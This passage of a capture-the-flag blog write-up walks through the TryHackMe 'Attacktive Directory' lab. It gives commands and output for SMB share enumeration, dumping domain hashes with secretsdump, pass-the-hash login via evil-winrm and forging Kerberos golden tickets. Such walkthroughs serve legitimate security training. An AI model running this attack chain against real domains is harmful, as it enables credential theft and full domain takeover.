  <p><strong>We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?</strong>
<br />
<code class="language-plaintext highlighter-rouge">svc-admin</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)</strong>
<br />
<code class="language-plaintext highlighter-rouge">Kerberos 5 AS-REP etype 23</code>, as seen from the John output.</p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)</strong>
<br />
<code class="language-plaintext highlighter-rouge">18200</code> found using <code class="language-plaintext highlighter-rouge">hashcat --help | grep -i kerberos</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>Now crack the hash with the modified password list provided, what is the user accounts password?</strong>
<br />
<code class="language-plaintext highlighter-rouge">management2005</code></p>
</blockquote>

<h2 id="re-enumerating-smb"><span class="me-2">Re-Enumerating SMB</span><a href="#re-enumerating-smb" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<blockquote>
  <p>With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.</p>
</blockquote>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>smbclient <span class="nt">-L</span> <span class="s2">"//10.10.60.35/"</span> <span class="nt">-U</span> <span class="s2">"svc-admin%management2005"</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/attacktivedirectory/smbclient_as_svc_admin.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/smbclient_as_svc_admin.png" alt="as_rep"  loading="lazy"></a>
<em>We have access to 6 shares now</em></p>

<p><strong>What do we learn from the <code class="language-plaintext highlighter-rouge">smbclient</code> output ?</strong></p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th style="text-align: left">Share name</th>
      <th style="text-align: left">Description</th>
      <th style="text-align: left">Default share ?</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: left">ADMIN$</td>
      <td style="text-align: left">Provide remote access to the system root</td>
      <td style="text-align: left">Yes</td>
    </tr>
    <tr>
      <td style="text-align: left">backup</td>
      <td style="text-align: left"> </td>
      <td style="text-align: left"><strong>No</strong></td>
    </tr>
    <tr>
      <td style="text-align: left">IPC$</td>
      <td style="text-align: left">Inter-Process Communication</td>
      <td style="text-align: left">Yes</td>
    </tr>
    <tr>
      <td style="text-align: left">NETLOGON</td>
      <td style="text-align: left">Store and distribute logon scripts, policies etc</td>
      <td style="text-align: left">Yes</td>
    </tr>
    <tr>
      <td style="text-align: left">SYSVOL</td>
      <td style="text-align: left">Store and replicate domain-wide files like GPO, GPP …</td>
      <td style="text-align: left">Yes</td>
    </tr>
  </tbody>
</table></div>

<p>Enumerating non-defaults shares first is often a good idea:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>smbclient <span class="s2">"//10.10.60.35/backup"</span> <span class="nt">-U</span> <span class="s2">"svc-admin%management2005"</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/attacktivedirectory/smbclient_get_data.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/smbclient_get_data.png" alt="as_rep"  loading="lazy"></a></p>

<div file="backup_credentials.txt" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="backup_credentials.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
</pre></td></tr></tbody></table></code></div></div>

<p>Looks like base64, let’s decode it from the terminal:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Chall/THM/Attacktivedirectory/Exploit]
└─<span class="nv">$ </span><span class="nb">cat </span>backup_credentials.txt | <span class="nb">base64</span> <span class="nt">-d</span>
backup@spookysec.local:backup2517860   
</pre></td></tr></tbody></table></code></div></div>

<p>And we retrieve the backup credentials.</p>

<h5 id="answering-questions-3"><span class="me-2">Answering questions</span><a href="#answering-questions-3" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>

<blockquote class="prompt-info">
  <p><strong>What utility can we use to map remote SMB shares?</strong>
<br />
<code class="language-plaintext highlighter-rouge">smbclient</code> is a straightforward tool that we can use for this task</p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>Which option will list shares?</strong>
<br />
<code class="language-plaintext highlighter-rouge">-L</code>, found by reading the help menu</p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>How many remote shares is the server listing?</strong>
<br />
<code class="language-plaintext highlighter-rouge">6</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>There is one particular share that we have access to that contains a text file. Which share is it?</strong>
<br />
<code class="language-plaintext highlighter-rouge">backup</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What is the content of the file?</strong>
<br />
<code class="language-plaintext highlighter-rouge">YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>Decoding the contents of the file, what is the full contents?</strong>
<br />
<code class="language-plaintext highlighter-rouge">backup@spookysec.local:backup2517860</code></p>
</blockquote>

<h1 id="privesc">Privesc</h1>

<h2 id="secretsdump"><span class="me-2">Secretsdump</span><a href="#secretsdump" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<blockquote>
  <p>The backup account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.</p>
</blockquote>

<p>Interesting ! That means that we can probably dump Domain Credentials using a tool like <a href="https://www.kali.org/tools/impacket/#impacket-secretsdump">secretsdump</a>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>impacket-secretsdump <span class="nt">-just-dc</span> <span class="s2">"</span><span class="nv">$DOMAIN</span><span class="s2">/</span><span class="nv">$USERNAME</span><span class="s2">:</span><span class="nv">$PASSWORD</span><span class="s2">@</span><span class="nv">$TARGET_IP</span><span class="s2">"</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/attacktivedirectory/secrets_dump.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/secrets_dump.png" alt="as_rep"  loading="lazy"></a>
<em>And we get all the NTLM hashes</em></p>

<div file="hashes.text" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="hashes.text"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
</pre></td></tr></tbody></table></code></div></div>

<p>We can authenticate with the <code class="language-plaintext highlighter-rouge">Administrator</code> hash without having to crack it (using <a href="https://beta.hackndo.com/pass-the-hash/">pass-the-hash</a>), and with <code class="language-plaintext highlighter-rouge">krbtgt</code> hash, we can create Golden Tickets (more on that later).</p>

<h5 id="answering-questions-4"><span class="me-2">Answering questions</span><a href="#answering-questions-4" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<blockquote class="prompt-info">
  <p><strong>What method allowed us to dump NTDS.DIT?</strong>
<br />
<code class="language-plaintext highlighter-rouge">DRSUAPI</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What is the Administrators NTLM hash?</strong>
<br />
The hashes are in the format LM:NT, so the response is <code class="language-plaintext highlighter-rouge">0e0363213e37b94221497260b0bcb4fc</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What method of attack could allow us to authenticate as the user without the password?</strong>
<br />
<code class="language-plaintext highlighter-rouge">Pass The Hash</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What method of attack could allow us to authenticate as the user without the password?</strong>
<br />
<code class="language-plaintext highlighter-rouge">-H</code></p>
</blockquote>

<h2 id="getting-flags"><span class="me-2">Getting flags</span><a href="#getting-flags" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>There are several tools that supports <code class="language-plaintext highlighter-rouge">pass-the-hash</code> and that could allow us to get an Administrator shell on the Domain Controller:</p>
<ul>
  <li>impacket-psexec</li>
  <li>impacket-smbexec</li>
  <li>impacket-wmiexec</li>
  <li>evil-winrm</li>
</ul>

<p>Let’s go with <a href="https://www.kali.org/tools/evil-winrm/">evil-winrm</a>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>evil-winrm <span class="nt">-i</span> <span class="s2">"</span><span class="nv">$TARGET</span><span class="s2">"</span> <span class="nt">-u</span> <span class="s2">"</span><span class="nv">$USERNAME</span><span class="s2">"</span> <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$NT_HASH</span><span class="s2">"</span> 
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/attacktivedirectory/exploit.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/exploit.png" alt="as_rep"  loading="lazy"></a>
<em>We succesfully used the pass-the-hash method to authenticate as admin</em></p>

<p><a href="/assets/img/writeups/thm/attacktivedirectory/flags.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/flags.png" alt="as_rep"  loading="lazy"></a>
<em>And we can display grab the 3 flags</em></p>

<h1 id="bonus">Bonus</h1>
<h2 id="generating-golden-tickets"><span class="me-2">Generating Golden Tickets</span><a href="#generating-golden-tickets" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>I always forget the commands so this section serves like a memo. You can learn more about silver and golden tickets <a href="https://en.hackndo.com/kerberos-silver-golden-tickets/">here</a>.</p>

<p>Let’s start by getting the <strong>Domain SID</strong>. From <code class="language-plaintext highlighter-rouge">evil-winrm</code>, we type:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\&gt;</span> <span class="o">(</span>Get-ADDomain<span class="o">)</span>.DomainSID.Value 
S-1-5-21-3591857110-2884097990-301047963
</pre></td></tr></tbody></table></code></div></div>

<p>We <a href="http://127.0.0.1:4000/posts/thm-attacktivedirectory/#elevating-privileges-within-the-domain">already have</a> the NT hash of the <code class="language-plaintext highlighter-rouge">krbtgt</code> account, which is:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>0e2eb8158c27bed09861033026be4c21
</pre></td></tr></tbody></table></code></div></div>

<p>We can generate our Golden Tickets using <code class="language-plaintext highlighter-rouge">impacket-ticketer</code>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>impacket-ticketer <span class="nt">-nthash</span> <span class="nv">$KRBTGT_NT_HASH</span> <span class="se">\</span>
            <span class="nt">-dc-ip</span> <span class="nv">$DC_IP</span> <span class="se">\</span>
            <span class="nt">-domain-sid</span> <span class="nv">$DOMAIN_SID</span> <span class="se">\</span>
            <span class="nt">-domain</span> <span class="nv">$DOMAIN_NAME</span> <span class="se">\</span>
            <span class="nv">$USERNAME</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/attacktivedirectory/golden_ticket.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/golden_ticket.png" alt="as_rep"  loading="lazy"></a>
<em>We’ve succesfully generated a Golden Ticket</em></p>

<p>Next we need to export a variable that will store the path to the generated Golden Ticket</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">export </span><span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/</span><span class="nv">$USERNAME</span><span class="s2">.cache"</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Finally, we can use whatever script for the impacket suite that we want, using the <code class="language-plaintext highlighter-rouge">-k -no-pass</code> options to specify that we want to authenticate using the kerberos ticket:</p>

<p><a href="/assets/img/writeups/thm/attacktivedirectory/golden_ticket_working.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/golden_ticket_working.png" alt="as_rep"  loading="lazy"></a>
<em>We are connected as admin without having to authenticate</em></p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/writeups/">Writeups</a>,
          <a href="/categories/tryhackme/">TryHackMe</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/writeups/"
            class="post-tag no-text-decoration"
          >writeups</a>
        
          <a
            href="/tags/tryhackme/"
            class="post-tag no-text-decoration"
          >tryhackme</a>
        
          <a
            href="/tags/active-directory/"
            class="post-tag no-text-decoration"
          >active-directory</a>
        
          <a
            href="/tags/impacket/"
            class="post-tag no-text-decoration"
          >impacket</a>
        
          <a
            href="/tags/asreproast/"
            class="post-tag no-text-decoration"
          >asreproast</a>
        
          <a
            href="/tags/kerberos/"
            class="post-tag no-text-decoration"
          >kerberos</a>
        
          <a
            href="/tags/golden-ticket/"
            class="post-tag no-text-decoration"
          >golden-ticket</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Attacktive%20Directory%20-%20NullBrunk&url=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fthm-attacktivedirectory%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Attacktive%20Directory%20-%20NullBrunk&u=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fthm-attacktivedirectory%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fthm-attacktivedirectory%2F&text=Attacktive%20Directory%20-%20NullBrunk" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

            
          </main>

         
            <!-- panel -->
            <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
              <div class="access">
                





                

  <section>
      <h2 class="panel-heading no-border">Tags</h2>

      <nav id="toc">
        <div class="d-flex flex-wrap mt-3 mb-1 me-3">
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/tryhackme/">tryhackme</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/active-directory/">active-directory</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/impacket/">impacket</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/asreproast/">asreproast</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/kerberos/">kerberos</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/golden-ticket/">golden-ticket</a>
          
        </div>
      </nav>
  </section>


              </div>

              
                
                






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-1 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

              
            </aside>
          
        </div>

        <div class="row">
          <!-- tail -->

          
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/thm-opacity/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735833600"
  data-df="ll"
  
>
  Jan  2, 2025
</time>

              <h4 class="pt-0 my-2">Opacity</h4>
              <div class="text-muted">
                <p>Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/thm-whiterose/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735747200"
  data-df="ll"
  
>
  Jan  1, 2025
</time>

              <h4 class="pt-0 my-2">Whiterose</h4>
              <div class="text-muted">
                <p>Yet another Mr. Robot themed challenge.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/wonderland/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735660800"
  data-df="ll"
  
>
  Dec 31, 2024
</time>

              <h4 class="pt-0 my-2">Wonderland</h4>
              <div class="text-muted">
                <p>Fall down the rabbit hole and enter wonderland.</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      

  <section>
      <h2 class="panel-heading no-border">Tags</h2>

      <nav id="toc">
        <div class="d-flex flex-wrap mt-3 mb-1 me-3">
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/poc/">poc</a>
          
        </div>
      </nav>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

